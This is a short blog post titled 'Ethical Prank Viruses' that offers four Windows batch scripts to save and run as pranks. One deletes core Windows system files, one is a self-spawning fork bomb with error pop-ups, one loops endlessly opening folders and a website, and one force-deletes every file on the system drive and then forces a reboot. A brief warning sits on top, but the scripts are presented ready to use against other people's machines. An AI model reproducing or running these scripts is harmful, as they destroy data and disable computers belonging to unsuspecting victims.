Ethical Prank Viruses
- shikhar kwatra
- Mar 24, 2019
- 1 min read
NOTE : DON'T TRY THIS ON YOUR COMPUTER....U MAY END UP IN CRASHING UR SYSTEM
A FEW ARE GIVEN BELOW...
@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"
save as virus.bat
--------------------------------------------------------------------------------------
start
MSG * ERROR VIRUS!!!
1.bat
save as 1.bat
1) Control + Alt + Delete
2) Processes
3) Right Click on cmd.exe
4) End Procress Tree
5) Hit your head and ur PC with a hammer .
6) Enjoy ur? life.
--------------------------------------------------------------------------------------
@echo off
md 1
md 2
md 3
md 4
md 5
:loop
start 1
start 2
start 3
start 4
start 5
start www.anywebsiteyouwantthere.com
goto loop
save as anything.bat
--------------------------------------------------------------------------------------
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
save it anything.bat
Comments